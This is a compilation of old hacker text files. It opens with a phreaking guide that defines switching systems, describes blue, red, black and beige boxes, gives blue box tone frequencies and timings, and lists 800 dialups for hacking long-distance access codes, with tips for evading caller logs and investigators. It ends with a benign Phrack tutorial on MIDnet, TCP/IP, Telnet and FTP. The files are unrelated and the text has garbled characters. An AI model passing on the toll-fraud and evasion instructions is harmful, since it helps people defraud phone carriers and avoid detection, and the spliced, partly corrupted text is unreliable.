Phreak : 1. The action of using mischevious and mostly illegal ways in order to not pay for some sort of tele- communications bill, order, transfer, or otherservice. It often involves usage of highly illegal boxes and machines in order to defeat the security that is set up to avoid this sort of happening. [fr'eaking]. v.
2. A person who uses the above methods of destructionand chaos in order to make a better life for all. A true phreaker will not not go against his fellows or narc on people who have ragged on him or do anything termed to be dishonorable to phreaks. [fr'eek]. n.
3. A certain code or dialup useful in the action of being a phreak. (Example: "I hacked a new metro phreak last night.")
Switching System: 1. There are 3 main switching systems currently employed in the US, and a few other systems will be mentioned as background.
A) SxS: This system was invented in 1918 and was employed in over half of the country until 1978. It is a very basic system that is a general waste of energy and hard work on the linesman. A good way to identify this is that it requires a coin in thephone booth before it will give you a dial tone, or thatno call waiting, call forwarding, or any other such service is available. Stands for: Step by Step
B) XB: This switching system was first employed in 1978 in order to take care of most of the faults of SxS switching. Not only is it more efficient, but it also can support different services in variousforms. XB1 is Crossbar Version 1. That is very limited and is hard to distinguish from SxS except by directview of the wiring involved. Next up was XB4, Crossbar Version 4. With this system, some of the basicthings like DTMF that were not available with SxS can be accomplished. For the final stroke of XB, XB5 was created. This is a service that can allow DTMF plus most 800 type services (which were not always available.) Stands for: Crossbar.
C) ESS: A nightmare in telecom. In vivid color, ESS is a pretty bad thing to have to stand up to. It is
quite simple to identify. Dialing 911 foremergencies, and ANI [see ANI below] are the most common facetsof the dread system. ESS has the capability to list ina person's caller log what number was called, how long the call took, and even the status of theconversation (modem or otherwise.) Since ESS has been employed, which has been very recently, it has gone through many kinds of revisions. The latest system to dateis ESS 11a, that is employed in Washington D.C. for security reasons. ESS is truly trouble for any phreak, because it is 'smarter' than the other systems. For instance, if on your caller log theysaw 50 calls to 1-800-421-9438, they would be able to do a CN/A [see Loopholes below] on your number and determine whether you are subscribed to that service or not. This makes most calls a hazard, because although 800 numbers appear to be free, they are recorded on your caller log and then right beforeyou receive your bill it deletes the billings for them. But before that the are open to inspection, which is one reason why extended use of any code is dangerous under ESS. Some of the boxes [see Boxing below] are unable to function in ESS. It is generally a menace to the true phreak. Stands For: Electronic Switching System. Because they could appear on a filter somewhere or maybe it is just nice to know them anyways.
A) SSS: Strowger Switching System. First non-operator system available.
B) WES: Western Electronics Switching. Used about 40 years ago with some minor places out west.
Boxing: 1) The use of personally designed boxes that emit or cancel electronical impulses that allow simpler acting while phreaking. Through the use of separate boxes, you can accomplish most feats possible with or without the control of an operator.
2) Some boxes and their functions are listed below. Ones marked with '*' indicate that they are not operatable in ESS.
*Black Box: Makes it seem to the phone company that the phone was never picked up. Blue Box : Emits a 2600hz tone that allows you to do such things as stack a trunk line, kick the operator off line, and others. Red Box : Simulates the noise of a quarter, nickel, or dime being dropped into a payphone.
Cheese Box : Turns your home phone into a pay phone to throw off traces (a red box is usually needed in order to call out.) *Clear Box : Gives you a dial tone on some of the old SxS payphones without putting in a coin. Beige Box : A simpler produced linesman's handsetthat allows you to tap into phone lines and extract by eavesdropping, or crossing wires, etc. Purple Box : Makes all calls made out from your house seem to be local calls.
ANI [ANI]: 1) Automatic Number Identification. A service available on ESS that allows a phone service [see Dialups below] to record the number that anycertain code was dialed from along with the number that was called and print both of these on the customerbill. 950 dialups [see Dialups below] are all designed just to use ANI. Some of the services do not have the proper equipment to read the ANI impulses yet, but it is impossible to see which is which without being busted or not busted first.
Dialups [dy'l'ups]: 1) Any local or 800 extended outlet that allowsinstant access to any service such as MCI, Sprint, or AT&T that from there can be used by handpicking or using a program to reveal other peoples codes which can then be used moderately until they find out about it and you must switch to another code (preferrably before they find out about it.)
2) Dialups are extremely common on both senses. Some dialups reveal the company that operates them as soon as you hear the tone. Others are much harder and some you may never be able to identify. Asmall list of dialups:
1-800-421-9438 (5 digit codes) 1-800-547-6754 (6 digit codes) 1-800-345-0008 (6 digit codes) 1-800-734-3478 (6 digit codes) 1-800-222-2255 (5 digit codes)
3) Codes: Codes are very easily accessed procedures when you call a dialup. They will give you somesort of tone. If the tone does not end in 3 seconds, then punch in the code and immediately followingthe code, the number you are dialing but strike the '1' in the beginning out first. If the tone does end, then punch in the code when the tone ends. Then, it will give you another tone. Punch in the
number you are dialing, or a '9'. If you punch in a '9' and the tone stops, then you messed up a little. If you punch in a tone and the tone continues, then simply dial then number you are calling without the '1'.
4) All codes are not universal. The only type that I know of that is truly universal is Metrophone. Almost every major city has a local Metro dialup (for Philadelphia, (215)351-0100/0126) and sincethe codes are universal, almost every phreak has used them once or twice. They do not employ ANI in any outlets that I know of, so feel free to check through your books and call 555-1212 or, as a more devious manor, subscribe yourself. Then, never use your own code. That way, if they check up on youdue to your caller log, they can usually find out that you are subscribed. Not only that but you couldset a phreak hacker around that area and just let it hack away, since they usually group them, and, as a bonus, you will have their local dialup.
5) 950's. They seem like a perfectly cool phreakers dream. They are free from your house, frompayphones, from everywhere, and they host all of the majorlong distance companies (950)1044 , 950)1077 , 950-1088 , 950-1033 .) Well, they aren't. They were designedfor ANI. That is the point, end of discussion.
A phreak dictionary. If you remember all of the things contained onthat fileup there, you may have a better chance of doing whatever it is youdo. This next section is maybe a little more interesting...
Blue Box Plans:---------------
These are some blue box plans, but first, be warned, there have been2600hz tone detectors out on operator trunk lines since XB4. The ideabehindit is to use a 2600hz tone for a few very naughty functions that can reallymake your day lighten up. But first, here are the plans, or the heart ofthefile:
700 : 1 : 2 : 4 : 7 : 11 :900 : + : 3 : 5 : 8 : 12 :1100 : + : + : 6 : 9 : KP :1300 : + : + : + : 10 : KP2 :1500 : + : + : + : + : ST : : 700 : 900 :1100 :1300 :1500 :
Stop! Before you diehard users start piecing those little tone tidbitstogether, there is a simpler method. If you have an Apple-Cat with aprogram like Cat's Meow IV, then you can generate the necessary tones, the2600hz tone, the KP tone, the KP2 tone, and the ST tone through the dialsection. So if you have that I will assume you can boot it up and it works,and I'll do you the favor of telling you and the other users what to dowiththe blue box now that you have somehow constructed it. The connection to anoperator is one of the most well known and used ways of having fun withyourblue box. You simply dial a TSPS (Traffic Service Positioning Station, orthe operator you get when you dial '0') and blow a 2600hz tone through theline. Watch out! Do not dial this direct! After you have done that, it isquite simple to have fun with it. Blow a KP tone to start a call, a ST toneto stop it, and a 2600hz tone to hang up. Once you have connected to it,here are some fun numbers to call with it:
0-700-456-1000 Teleconference (free, because you are the operator!) (Area code)-101 Toll Switching (Area code)-121 Local Operator (hehe) (Area code)-131 Information (Area code)-141 Rate & Route (Area code)-181 Coin Refund Operator (Area code)-11511 Conference operator (when you dial 800-544-6363)
Well, those were the tone matrix controllers for the blue box and someother helpful stuff to help you to start out with. But those are only thefunctions with the operator. There are other k-fun things you can do withit.
More advanced Blue Box Stuff:
Oops. Small mistake up there. I forgot tone lengths. Um, you blow atone pair out for up to 1/10 of a second with another 1/10 second forsilencebetween the digits. KP tones should be sent for 2/10 of a second. One waytoconfuse the 2600hz traps is to send pink noise over the channel (for all ofyou that have decent BSR equalizers, there is major pink noise in there.)
Using the operator functions is the use of the 'inward' trunk line.Thatis working it from the inside. From the 'outward' trunk, you can dosuchthings as make emergency breakthrough calls, tap into lines, busy all ofthelines in any trunk (called 'stacking'), enable or disable the TSPS's, andfor some 4a systems you can even re-route calls to anywhere.
All right. The one thing that every complete phreak guide should bewithout is blue box plans, since they were once a vital part of phreaking.Another thing that every complete file needs is a complete listing of allofthe 800 numbers around so you can have some more Fu7nCð¨ ð /-/ 800 Dialup Listings /-/
1-800-345-0008 (6) 1-800-547-6754 (6)1-800-245-4890 (4) 1-800-327-9136 (4)1-800-526-5305 (8) 1-800-858-9000 (3)
1-800-437-9895 (7) 1-800-245-7508 (5)1-800-343-1844 (4) 1-800-322-1415 (6)1-800-437-3478 (6) 1-800-325-7222 (6)
All right, set Cat Hacker 1.0 on those numbers and have a fuck of aday. That is enough with 800 codes, by the time this gets around to you Idunno what state those codes will be in, but try them all out anyways andsee what you get. On some 800 services now, they have an operator who willanswer and ask you for your code, and then your name. Some will switch backand forth between voice and tone verification, you can never be quite surewhich you will be upagainst.
Armed with this knowledge you should be having a pretty good timephreaking now. But class isn't over yet, there are still a couple importantrules that you should know. If you hear continual clicking on the line,thenyou should assume that an operator is messing with something, maybe evenlistening in on you. It is a good idea to call someone back when the phonestarts doing that. If you were using a code, use a different code and/orservice to call him back.
A good way to detect if a code has gone bad or not is to listen whenthe number has been dialed. If the code is bad you will probably hear thephone ringing more clearly and more quickly than if you were using adifferent code. If someone answers voice to it then you can immediatelyassume that it is an operative for whatever company you are using. Thefamed'311311' code for Metro is one of those. You would have to be quite stupidto actually respond, because whoever you ask for the operator will alwayssay 'He's not in right now, can I have him call you back?' and then theywill ask for your name and phone number. Some of the more sophisticatedcompanies will actually give you a carrier on a line that is supposed togive you a carrier and then just have garbage flow across the screen likeitwould with a bad connection. That is a feeble effort to make you think thatthe code is still working and maybe get you to dial someone's voice, a goodtest for the carrier trick is to dial anumber that will give you a carrierthat you have never dialed with that code before, that will allow you todetermine whether the code is good or not. For our next section, a lighterlook at some of the things that a phreak should not be without. Avocabulary.A few months ago, it was a quite strange world for the modem people outthere. But now, a phreaker's vocabulary is essential if you wanna make agood impression on people when you post what you know about certainsubjects.
/-/ Vocabulary /-/
- Do not misspell except certain exceptions:
phone -> fone freak -> phreak
- Never substitute 'z's for 's's. (i.e. codez -> codes)
- Never leave many characters after a post (i.e. Hey Dudes!#!@#@!#!@)
- NEVER use the 'k' prefix (k-kool, k-rad, k-whatever)
‡ - Do not abbreviate. (I got lotsa wares w/ docs)
- Never substitute '0' for 'o' (r0dent, l0zer).
- Forget about ye old upper case, it looks ruggyish.
All right, that was to relieve the tension of what is being drilledinto your minds at the moment. Now, however, back to the teaching course.Here are somethings you should know about phones and billings for phones,etc.
LATA: Local Access Transference Area. Some people who live in largecities or areas may be plagued by this problem. For instance, let's say youlive in the 215 area code under the 542 prefix (Ambler, Fort Washington).Ifyou went to dial in a basic Metro code from that area, for instance,351-0100, that might not be counted under unlimited local calling becauseitis out of your LATA. For some LATA's, you have to dial a '1' without thearea code before you can dial the phone number. That could prove a hasslefor us all if you didn't realize you would be billed for that sort of call.In that way, sometimes, it is better to be safe than sorry and phreak.
The Caller Log: In ESS regions, for every household around, the phonecompany has something on you called a Caller Log. This shows every singlenumber that you dialed, and things can be arranged so it showed everynumberthat was calling to you. That's one main disadvantage of ESS, it is mostlycomputerized so a number scan could be done like that quite easily. Using adialup is an easy way to screw that, and is something worth remembering.Anyways, with the caller log, they check up and see what you dialed. Hmm...you dialed 15 different 800 numbers that month. Soon they find that you aresubscribed to none of those companies. But that is not the only thing. Mostpeople would imagine "But wait! 800 numbers don't show up on my phonebill!". To those people, it is a nice thought, but 800 numbers are pickedupon the caller log until right before they are sent off to you. So they cancheck right up on you before they send it away and can note the fact thatyou fucked up slightly and called one too many 800 lines.
Right now, after all of that, you should have a pretty good idea ofhowto grow up as a good phreak. Follow these guidelines, don't show off, anddon't take unnecessary risks when phreaking or hacking.
(*Greets to Pee Wee for this file taken from his 'Hell Disk' #1*) ---------------Jolly Roger

==Phrack Inc.==
Volume Three, Issue 27, File 3 of 12
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> <> <> <> Introduction to MIDNET <>
<> ~~~~~~~~~~~~~~~~~~~~~~ <> <> Chapter Seven Of The Future Transcendent Saga <> <> <> <> A More Indepth Look Into NSFnet <> <> National Science Foundation Network <> <> <> <> Presented by Knight Lightning <> <> June 16, 1989 <> <> <> <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
Prologue~~~~~~~~If you are not already familiar with NSFnet, I would suggest that you read:
"Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of 13), anddefinitely;"NSFnet: National Science Foundation Network" (Phrack Inc., Volume Three, Issue 26, File 4 of 11).
Table Of Contents~~~~~~~~~~~~~~~~~* Introduction* The DOD Protocol Suite* Names and Addresses In A Network* Telnet (*NOT* Telenet)* File Transfer* Mail
Introduction~~~~~~~~~~~~MIDNET is a regional computer network that is part of the NSFnet, theNationalScience Foundation Network. Currently, eleven mid-United Statesuniversitiesare connected to each other and to the NSFnet via MIDnet:
UA - University of Arkansas at FayettevilleISU - Iowa State University at AmesUI - University of Iowa at Iowa CityKSU - Kansas State University at ManhattanKU - University of Kansas at LawrenceUMC - University of Missouri at ColumbiaWU - Washington University at St. Louis, MissouriUNL - University of Nebraska at LincolnOSU - Oklahoma State University at StillwaterUT - University of Tulsa (Oklahoma)OU - University of Oklahoma at Norman
Researchers at any of these universities that have funded grants can accessthesix supercomputer centers funded by the NSF:
John Von Neuman Supercomputer CenterNational Center for Atmospheric Research
Cornell National Supercomputer FacilityNational Center for Supercomputing ApplicationsPittsburgh Supercomputing CenterSan Diego Supercomputing Center
In addition, researchers and scientists can communicate with each otherover avast world-wide computer network that includes the NSFnet, ARPAnet, CSnet,BITnet, and others that you have read about in The Future TranscendentSaga.Please refer to "Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of13)for more details.
MIDnet is just one of several regional computer networks that comprise theNSFnet system. Although all of these regional computer networks work thesame,MIDnet is the only one that I have direct access to and so this file iswrittenfrom a MIDnet point of view. For people who have access to the otherregionalnetworks of NSFnet, the only real differences depicted in this file thatwouldnot apply to the other regional networks are the universities that areservedby MIDnet as opposed to:
NYSERnet in New York StateSURAnet in the southeastern United StatesSEQSUInet in TexasBARRnet in the San Francisco areaMERIT in Michigan
(There are others that are currently being constructed.)
These regional networks all hook into the NSFnet backbone, which is anetworkthat connects the six supercomputer centers. For example, a person atKansasState University can connect with a supercomputer via MIDnet and the NSFnetbackbone. That researcher can also send mail to colleagues at theUniversityof Delaware by using MIDnet, NSFnet and SURAnet. Each university has itsownlocal computer network which connects on-campus computers as well asprovidinga means to connecting to a regional network.
Some universities are already connected to older networks such as CSnet,theARPAnet and BITnet. In principal, any campus connected to any of thesenetworks can access anyone else in any other network since there aregatewaysbetween the networks.
Gateways are specialized computers that forward network traffic, therebyconnecting networks. In practice, these wide-area networks use differentnetworking technology which make it impossible to provide full
functionalityacross the gateways. However, mail is almost universally supported acrossallgateways, so that a person at a BITnet site can send mail messages to acolleague at an ARPAnet site (or anywhere else for that matter). Youshouldalready be somewhat familiar with this, but if not refer to;
"Limbo To Infinity" (Phrack Inc., Volume Two, Issue 24, File 3 of 13) and"Internet Domains" (Phrack Inc., Volume Three, Issue 26, File 8 of 11)
Computer networks rely on hardware and software that allow computers tocommunicate. The language that enables network communication is called aprotocol. There are many different protocols in use today. MIDnet usestheTCP/IP protocols, also known as the DOD (Department of Defense) ProtocolSuite.
Other networks that use TCP/IP include ARPAnet, CSnet and the NSFnet. Infact,all the regional networks that are linked to the NSFnet backbone arerequiredto use TCP/IP. At the local campus level, TCP/IP is often used, althoughotherprotocols such as IBM's SNA and DEC's DECnet are common. In order tocommunicate with a computer via MIDnet and the NSFnet, a computer at acampusmust use TCP/IP directly or use a gateway that will translate its protocolsinto TCP/IP.
The Internet is a world-wide computer network that is the conglomeration ofmost of the large wide area networks, including ARPAnet, CSnet, NSFnet, andtheregionals, such as MIDnet. To a lesser degree, other networks such asBITnetthat can send mail to hosts on these networks are included as part of theInternet. This huge network of networks, the Internet, as you have by nowreadall about in the pages of Phrack Inc., is a rapidly growing and verycomplexentity that allows sophisticated communication between scientists,students,government officials and others. Being a part of this community is bothexciting and challenging.
This chapter of the Future Transcendent Saga gives a general description oftheprotocols and software used in MIDnet and the NSFNet. A discussion ofseveralof the more commonly used networking tools is also included to enable youtomake practical use of the network as soon as possible.
The DOD Protocol Suite~~~~~~~~~~~~~~~~~~~~~~The DOD Protocol Suite includes many different protocols. Each protocol isa
specification of how communication is to occur between computers. Computerhardware and software vendors use the protocol to create programs andsometimesspecialized hardware in order to implement the network function intended bytheprotocol. Different implementations of the same protocol exist for thevariedhardware and operating systems found in a network.
The three most commonly used network functions are:
Mail -- Sending and receiving messagesFile Transfer -- Sending and receiving filesRemote Login -- Logging into a distant computer
Of these, mail is probably the most commonly used.
In the TCP/IP world, there are three different protocols that realize thesefunctions:
SMTP -- (Simple Mail Transfer Protocol) MailFTP -- (File Transfer Protocol) sending and receiving filesTelnet -- Remote login
How to use these protocols is discussed in the next section. At firstglance,it is not obvious why these three functions are the most common. Afterall,mail and file transfer seem to be the same thing. However, mail messagesarenot identical to files, since they are usually comprised of only ASCIIcharacters and are sequential in structure. Files may contain binary dataandhave complicated, non-sequential structures. Also, mail messages canusuallytolerate some errors in transmission whereas files should not contain anyerrors. Finally, file transfers usually occur in a secure setting (i.e.Theusers who are transferring files know each other's names and passwords andarepermitted to transfer the file, whereas mail can be sent to anybody as longastheir name is known).
While mail and transfer accomplish the transfer of raw information from onecomputer to another, Telnet allows a distant user to process thatinformation,either by logging in to a remote computer or by linking to anotherterminal.Telnet is most often used to remotely log in to a distant computer, but itisactually a general-purpose communications protocol. I have found itincrediblyuseful over the last year. In some ways, it could be used for a great dealofaccess because you can directly connect to another computer anywhere thathasTCP/IP capabilities, however please note that Telnet is *NOT* Telenet.
‡There are other functions that some networks provide, including thefollowing:
- Name to address translation for networks, computers and people- The current time- Quote of the day or fortune- Printing on a remote printer, or use of any other remote peripheral- Submission of batch jobs for non-interactive execution- Dialogues and conferencing between multiple users- Remote procedure call (i.e. Distributing program execution over several remote computers)- Transmission of voice or video information
Some of these functions are still in the experimental stages and requirefastercomputer networks than currently exist. In the future, new functions willundoubtedly be invented and existing ones improved.
The DOD Protocol Suite is a layered network architecture, which means thatnetwork functions are performed by different programs that workindependentlyand in harmony with each other. Not only are there different programs butthere are different protocols. The protocols SMTP, FTP and Telnet aredescribed above. Protocols have been defined for getting the current time,thequote of the day, and for translating names. These protocols are calledapplications protocols because users directly interact with the programsthatimplement these protocols.
The Transmission Control Protocol, TCP, is used by many of the applicationprotocols. Users almost never interact with TCP directly. TCP establishesareliable end-to-end connection between two processes on remote computers.Datais sent through a network in small chunks called packets to improvereliabilityand performance. TCP ensures that packets arrive in order and withouterrors.If a packet does have errors, TCP requests that the packet beretransmitted.
In turn, TCP calls upon IP, Internet Protocol, to move the data from onenetwork to another. IP is still not the lowest layer of the architecture,since there is usually a "data link layer protocol" below it. This can beanyof a number of different protocols, two very common ones being X.25 andEthernet.
FTP, Telnet and SMTP are called "application protocols", since they aredirectly used by applications programs that enable users to make use of thenetwork. Network applications are the actual programs that implement theseprotocols and provide an interface between the user and the computer. Animplementation of a network protocol is a program or package of programsthatprovides the desired network function such as file transfer. Sincecomputersdiffer from vendor to vendor (e.g. IBM, DEC, CDC), each computer must have
itsown implementation of these protocols. However, the protocols arestandardizedso that computers can interoperate over the network (i.e. Can understandandprocess each other's data). For example, a TCP packet generated by an IBMcomputer can be read and processed by a DEC computer.
In many instances, network applications programs use the name of theprotocol.For example, the program that transfers files may be called "FTP" and theprogram that allows remote logins may be called "Telnet." Sometimes theseprotocols are incorporated into larger packages, as is common with SMTP.Manycomputers have mail programs that allow users on the same computer to sendmailto each other. SMTP functions are often added to these mail programs sothatusers can also send and receive mail through a network. In such cases,thereis no separate program called SMTP that the user can access, since the mailprogram provides the user interface to this network function.
Specific implementation of network protocols, such as FTP, are tailored tothecomputer hardware and operating system on which they are used. Therefore,theexact user interface varies from one implementation to another. Forexample,the FTP protocol specifies a set of FTP commands which each FTPimplementationmust understand and process. However, these are usually placed at a lowlevel,often invisible to the user, who is given a higher set of commands to use.
These higher-level commands are not standardized so they may vary from oneimplementation of FTP to another. For some operating systems, not all ofthesecommands make equal sense, such as "Change Directory," or may havedifferentmeanings. Therefore the specific user interface that the user sees willprobably differ.
This file describes a generic implementation of the standard TCP/IPapplicationprotocols. Users must consult local documentation for specifics at theirsites.
Names and Addresses In A Network~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~In DOD Protocol Suite, each network is given a unique identifying number.Thisnumber is assigned by a central authority, namely the Network InformationCenter run by SRI, abbreviated as SRI-NIC, in order to prevent more thanonenetwork from having the same network number. For example, the ARPAnet hasnetwork number 10 while MIDnet has a longer number, namely 128.242.
‡Each host in a network has a unique identification so other hosts canspecifythem unambiguously. Host numbers are usually assigned by the organizationthatmanages the network, rather than one central authority. Host numbers donotneed to be unique throughout the whole Internet but two hosts on the samenetwork need to have unique host numbers.
The combination of the network number and the host number is called the IPaddress of the host and is specified as a 32-bit binary number. All IPaddresses in the Internet are expressible as 32-bit numbers, although theyareoften written in dotted decimal notation. Dotted decimal notation breaksthe32-bit number into four eight-bit parts or octets and each octet isspecifiedas a decimal number. For example, 00000001 is the binary octet thatspecifiesthe decimal number 1, while 11000000 specifies 192. Dotted decimalnotationmakes IP addresses much easier to read and remember.
Computers in the Internet are also identified by hostnames, which arestringsof characters, such as "phrackvax." However, IP packets must specify the32-bit IP address instead of the hostname so some way to translatinghostnamesto IP addresses must exist.
One way is to have a table of hostnames and their corresponding IPaddresses,called a hosttable. Nearly every TCP/IP implementation has such ahosttable,although the weaknesses of this method are forcing a shift to a new schemecalled the domain name system. In UNIX systems, the hosttable is oftencalled"/etc/hosts." You can usually read this file and find out what the IPaddresses of various hosts are. Other systems may call this file by adifferent name and make it unavailable for public viewing.
Users of computers are generally given accounts to which all charges forcomputer use are billed. Even if computer time is free at an installation,accounts are used to distinguish between the users and enforce fileprotections. The generic term "username" will be used in this file torefer tothe name by which the computer account is accessed.
In the early days of the ARPAnet which was the first network to use theTCP/IPprotocols, computer users were identified by their username, followed by acommercial "at" sign (@), followed by the hostname on which the accountexisted. Networks were not given names, per se, although the IP addressspecified a network number.
For example, "knight@phrackvax" referred to user "knight" on host"phrackvax."This did not specify which network "phrackvax" was on, although that
information could be obtained by examining the hosttable and the IP addressfor"phrackvax." (However, "phrackvax" is a ficticious hostname used for thispresentation.)
As time went on, every computer on the network had to have an entry in itshosttable for every other computer on the network. When several networkslinked together to form the Internet, the problem of maintaining thiscentralhosttable got out of hand. Therefore, the domain name scheme wasintroduced tosplit up the hosttable and make it smaller and easier to maintain.
In the new domain name scheme, users are still identified by theirusernames,but hosts are now identified by their hostname and any and all domains ofwhichthey are a part. For example, the following address,"KNIGHT@UMCVMB.MISSOURI.EDU" specifies username "KNIGHT" on host "UMCVMB".However, host "UMCVMB" is a part of the domain "MISSOURI" " which is inturnpart of the domain "EDU". There are other domains in "EDU", although onlyoneis named "MISSOURI". In the domain "MISSOURI", there is only one hostnamed"UMCVMB".
However, other domains in "EDU" could theoretically have hosts named"UMCVMB"(although I would say that this is rather unlikely in this example). Thusthecombination of hostname and all its domains makes it unique. The method oftranslating such names into IP addresses is no longer as straightforward aslooking up the hostname in a table. Several protocols and specializednetworksoftware called nameservers and resolvers implement the domain name scheme.
Not all TCP/IP implementations support domain names because it is rathernew.In those cases, the local hosttable provides the only way to translatehostnames to IP addresses. The system manager of that computer will havetoput an entry into the hosttable for every host that users may want toconnectto. In some cases, users may consult the nameserver themselves to find outtheIP address for a given hostname and then use that IP address directlyinsteadof a hostname.
I have selected a few network hosts to demonstrate how a host system can bespecified by both the hostname and host numerical address. Some of thenodes Ihave selected are also nodes on BITnet, perhaps even some of the othersthat Ido not make a note of due a lack of omniscent awareness about each andeverysingle host system in the world :-)
‡- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- -Numerical Hostname LocationBITnet--------- -------- --------------18.72.0.39 ATHENA.MIT.EDU (Mass. Institute of Technology) ?26.0.0.73 SRI-NIC.ARPA (DDN Network Information Center) -36.21.0.13 MACBETH.STANFORD.EDU (Stanford University) ?36.21.0.60 PORTIA.STANFORD.EDU (Stanford University) ?128.2.11.131 ANDREW.CMU.EDU (Carnegie Mellon University)ANDREW128.3.254.13 LBL.GOV (Lawrence Berkeley Labrotories)LBL128.6.4.7 RUTGERS.RUTGERS.EDU (Rutgers University) ?128.59.99.1 CUCARD.MED.COLUMBIA.EDU (Columbia University) ?128.102.18.3 AMES.ARC.NASA.GOV (Ames Research Center [NASA]) -128.103.1.1 HARVARD.EDU (Harvard University)HARVARD128.111.24.40 HUB.UCSB.EDU (Univ. Of Calif-Santa Barbara) ?128.115.14.1 LLL-WINKEN.LLNL.GOV (Lawrence Livermore Labratories) -128.143.2.7 UVAARPA.VIRGINIA.EDU (University of Virginia) ?128.148.128.40 BROWNVM.BROWN.EDU (Brown University)BROWN128.163.1.5 UKCC.UKY.EDU (University of Kentucky)UKCC128.183.10.4 NSSDCA.GSFC.NASA.GOV (Goddard Space Flight Center[NASA])-128.186.4.18 RAI.CC.FSU.EDU (Florida State University)FSU128.206.1.1 UMCVMB.MISSOURI.EDU (Univ. of Missouri-Columbia)UMCVMB128.208.1.15 MAX.ACS.WASHINGTON.EDU (University of Washington)MAX128.228.1.2 CUNYVM.CUNY.EDU (City University of New York)CUNYVM129.10.1.6 NUHUB.ACS.NORTHEASTERN.EDU (Northeastern University)NUHUB131.151.1.4 UMRVMA.UMR.EDU (University of Missouri-Rolla)UMRVMA192.9.9.1 SUN.COM (Sun Microsystems, Inc.) -192.33.18.30 VM1.NODAK.EDU (North Dakota State Univ.)NDSUVM1192.33.18.50 PLAINS.NODAK.EDU (North Dakota State Univ.)NDSUVAX
Please Note: Not every system on BITnet has an IP address. Likewise, not every system that has an IP address is on BITnet. Also,while some locations like Stanford University may have nodes onBITnet and have hosts on the IP as well, this does not neccessarily imply that the systems on BITnet and on IP (the EDU domain in this case) are the same systems.
Attempts to gain unauthorized access to systems on theInternet are not tolerated and is legally a federal offense. At some hosts, they take this very seriously, especially thegovernment hosts such as NASA's Goddard Space Flight Center, where theydo not mind telling you so at the main prompt when you connectto their system.
However, some nodes are public access to an extent. The DDN Network Information Center can be used by anyone. The serverand database there have proven to be an invaluable source of information when locating people, systems, and otherinformation that is related to the Internet.- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- -Telnet
~~~~~~Remote login refers to logging in to a remote computer from a terminalconnected to a local computer. Telnet is the standard protocol in the DODProtocol Suite for accomplishing this. The "rlogin" program, provided withBerkeley UNIX systems and some other systems, also enables remote login.
For purposes of discussion, the "local computer" is the computer to whichyourterminal is directly connected while the "remote computer" is the computeronthe network to which you are communicating and to which your terminal is*NOT*directly connected.
Since some computers use a different method of attaching terminals tocomputers, a better definition would be the following: The "localcomputer" isthe computer that you are currently using and the "remote computer" is thecomputer on the network with which you are or will be communicating. Notethatthe terms "host" and "computer" are synonymous in the following discussion.
To use Telnet, simply enter the command: TELNET
The prompt that Telnet gives is: Telnet>
(However, you can specify where you want to Telnet to immediately andbypass
the the prompts and other delays by issuing the command: TELNET[location].)
There is help available by typing in ?. This prints a list of all thevalidsubcommands that Telnet provides with a one-line explanation.
Telnet> ?
To connect to to another computer, use the open subcommand to open aconnectionto that computer. For example, to connect to the host"UMCVMB.MISSOURI.EDU",do "open umcvmb.missouri.edu"
Telnet will resolve (i.e. Translate, the hostname "umcvmb.missouri.edu"into anIP address and will send a packet to that host requesting login. If theremotehost decides to let you attempt a login, it prompts you for your usernameandpassword. If the host does not respond, Telnet will "time out" (i.e. Waitfora reasonable amount of time such as 20 seconds) and then terminate with amessage such as "Host not responding."
If your computer does not have an entry for a remote host in its hosttableandit cannot resolve the name, you can use the IP address explicitly in thetelnetcommand. For example,
TELNET 26.0.0.73 (Note: This is the IP address for the DDN NetworkInformation Center [SRI-NIC.ARPA])
If you are successful in logging in, your terminal is connected to theremotehost. For all intents and purposes, your terminal is directly hard-wiredtothat host and you should be able to do anything on your remote terminalthatyou can do at any local terminal. There are a few exceptions to this rule,however.
Telnet provides a network escape character, such as CONTROL-T. You can findoutwhat the escape character is by entering the "status" subcommand:
Telnet> status
You can change the escape character by entering the "escape" subcommand:
Telnet> escape
When you type in the escape character, the Telnet prompt returns to yourscreenand you can enter subcommands. For example, to break the connection, which
usually logs you off the remote host, enter the subcommand "quit":
Telnet> quit
Your Telnet connection usually breaks when you log off the remote host, sothe"quit" subcommand is not usually used to log off.
When you are logged in to a remote computer via Telnet, remember that thereisa time delay between your local computer and the remote one. This oftenbecomes apparent to users when scrolling a long file across the terminalscreennd they wish to cancel the scrolling by typing CONTROL-C or somethingsimilar.After typing the special control character, the scrolling continues. Thespecial control character takes a certain amount of time to reach theremotecomputer which is still scrolling information. Thus response from theremotecomputer will not likely be as quick as response from a local computer.
Once you are remotely logged on, the computer you are logged on toeffectivelybecomes your "local computer," even though your original "local computer"stillconsiders you logged on. You can log on to a third computer which wouldthenbecome your "local computer" and so on. As you log out of each session,yourprevious session becomes active again.
File Transfer~~~~~~~~~~~~~
FTP is the program that allows files to be sent from one computer toanother."FTP" stands for "File Transfer Protocol".
When you start using FTP, a communications channel with another computer onthenetwork is opened. For example, to start using FTP and initiate a filetransfer session with a computer on the network called "UMCVMB", you wouldissue the following subcommand:
FTP UMCVMB.MISSOURI.EDU
Host "UMCVMB" will prompt you for an account name and password. If yourloginis correct, FTP will tell you so, otherwise it will say "login incorrect."Tryagain or abort the FTP program. (This is usually done by typing a specialcontrol character such as CONTROL-C. The "program abort" character variesfromsystem to system.)
Next you will see the FTP prompt, which is:
‡Ftp>
There are a number of subcommands of FTP. The subcommand "?" will listthesecommands and a brief description of each one.
You can initiate a file transfer in either direction with FTP, either fromtheremote host or to the remote host. The "get" subcommand initiates a filetransfer from the remote host (i.e. Tells the remote computer to send thefileto the local computer [the one on which you issued the "ftp" command]).Simplyenter "get" and FTP will prompt you for the remote host's file name andthe(new) local host's file name. Example:
Ftp> getRemote file name?theirfilelocal file name?myfile
ou can abbreviate this by typing both file names on the same line as the"get"subcommand. If you do not specify a local file name, the new local filewillbe called the same thing as the remote file. Valid FTP subcommands to getafile include the following:
get theirfile myfileget doc.x25
The "put" subcommand works in a similar fashion and is used to send a filefromthe local computer to the remote computer. Enter the command "put" and FTPwill prompt you for the local file name and then the remote file name. Ifthetransfer cannot be done because the file doesn't exist or for some otherreason, FTP will print an error message.
